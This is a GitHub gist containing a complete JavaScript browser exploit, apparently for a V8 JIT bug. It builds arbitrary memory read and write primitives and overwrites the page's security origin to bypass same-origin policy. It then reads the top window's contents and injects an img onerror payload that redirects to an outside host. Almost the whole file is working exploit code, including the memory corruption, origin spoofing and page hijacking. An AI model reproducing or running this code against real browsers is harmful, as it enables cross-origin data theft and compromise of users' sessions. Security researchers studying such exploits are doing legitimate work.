-
-
Save rootxharsh/d3740298e1c5aff5120c0ecf8495b750 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<b>pwn</b> | |
</html> | |
<script> | |
/* Thanks to zer0pts ptr-yudai Discord log which helped me write this exploit :) */ | |
var conversion_buffer = new ArrayBuffer(8); | |
var float_view = new Float64Array(conversion_buffer); | |
var int_view = new BigUint64Array(conversion_buffer); | |
BigInt.prototype.hex = function() { | |
return '0x' + this.toString(16); | |
}; | |
BigInt.prototype.i2f = function() { | |
int_view[0] = this; | |
return float_view[0]; | |
} | |
Number.prototype.f2i = function() { | |
float_view[0] = this; | |
return int_view[0]; | |
} | |
function gc() { | |
for (var i = 0; i < 0x10000; ++i) | |
var a = new ArrayBuffer(); | |
} | |
function pwn() | |
{ | |
class LeakArrayBuffer extends ArrayBuffer { | |
constructor(size) { | |
super(size); | |
this.slot = 0xb33f; | |
} | |
} | |
function jitme(a) { | |
var x = -1; | |
if (a) x = 0xFFFFFFFF; | |
var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); | |
arr.shift(); | |
var local_arr = Array(2); | |
local_arr[0] = 5.1; | |
var buff = new LeakArrayBuffer(0x1000); | |
arr[0] = 0x1122; | |
return [arr, local_arr, buff]; | |
} | |
/* Cause bug */ | |
gc(); | |
console.log("[+] START"); | |
console.log("[+] window.origin now " + window.origin); | |
for (var i = 0; i < 0x10000; ++i) | |
jitme(false); | |
gc(); | |
[corrput_arr, rwarr, corrupt_buff] = jitme(true); | |
corrput_arr[12] = 0x22444; | |
delete corrput_arr; | |
/* Primitives */ | |
function set_backing_store(l, h) { | |
rwarr[4] = ((h << 32n) | (rwarr[4].f2i() & 0xffffffffn)).i2f(); | |
rwarr[5] = ((rwarr[5].f2i() & 0xffffffff00000000n) | l).i2f(); | |
} | |
function addrof(o) { | |
corrupt_buff.slot = o; | |
return (rwarr[9].f2i() - 1n) & 0xffffffffn; | |
} | |
var corrupt_view = new DataView(corrupt_buff); | |
var corrupt_buffer_ptr_low = addrof(corrupt_buff); | |
console.log("[+] leak = " + corrupt_buffer_ptr_low.hex()); | |
/* Fake obj */ | |
var idx0Addr = corrupt_buffer_ptr_low - 0x10n; | |
var baseAddr = (corrupt_buffer_ptr_low & 0xffff0000n) - ((corrupt_buffer_ptr_low & 0xffff0000n) % 0x40000n) + 0x40000n; | |
var delta = baseAddr + 0x1cn - idx0Addr; | |
var addr_upper; | |
if ((delta % 8n) == 0n) { | |
var baseIdx = delta / 8n; | |
addr_upper = (rwarr[baseIdx].f2i() & 0xffffffffn) << 32n; | |
} else { | |
var baseIdx = ((delta - (delta % 8n)) / 8n); | |
addr_upper = rwarr[baseIdx].f2i() & 0xffffffff00000000n; | |
} | |
console.log("[+] upper = " + addr_upper.hex()); | |
function aar64(addr) { | |
set_backing_store(addr >> 32n, addr & 0xffffffffn); | |
return corrupt_view.getFloat64(0, true).f2i(); | |
} | |
function aaw64(addr, value) { | |
set_backing_store(addr >> 32n, addr & 0xffffffffn); | |
corrupt_view.setFloat64(0, value.i2f(), true); | |
} | |
function aaw32(addr, value) { | |
set_backing_store(addr >> 32n, addr & 0xffffffffn); | |
corrupt_view.setInt32(0, value, true); | |
} | |
function aaw8(addr, value) { | |
set_backing_store(addr >> 32n, addr & 0xffffffffn); | |
corrupt_view.setInt8(0, value , true); | |
} | |
var addr_window = addr_upper | addrof(window) + 0x18n; | |
console.log("[+] window = " + addr_window.hex()); | |
var addr_ldomwin = aar64(addr_window) + 0x80n; | |
console.log("[+] LoclDOMWindow = " + addr_ldomwin.hex()); | |
var get_sec_origin = aar64(addr_ldomwin + 0x110n); | |
console.log("[+] sec_origin_context " + get_sec_origin.hex()); | |
var addr_sec = aar64(get_sec_origin + 0x110n + 0x10n); | |
console.log("[+] security_context = " + addr_sec.hex()) | |
//var port = aar64(addr_sec+0x20n); // you can spoof the port which is at +0x20 from sec | |
//console.log("[+] port = " + port.hex()) | |
var sec_host = aar64(addr_sec+0x18n); | |
console.log("[+] host String = " + sec_host.hex()) | |
aaw32(sec_host, 0x656d6f73) //p32(0x656d6f73) = some | |
console.log("[+] window.origin after exp = "+window.origin) | |
try{ | |
console.log("[+] Accessing top.document.body.innerHTML ") | |
console.log(top.document.body.innerHTML); | |
top.document.body.innerHTML = '<img src=x onerror="location=`http://mws.rce.ee/`">' | |
} | |
catch(e){ | |
console.log("sed lyf") | |
} | |
} | |
pwn() | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment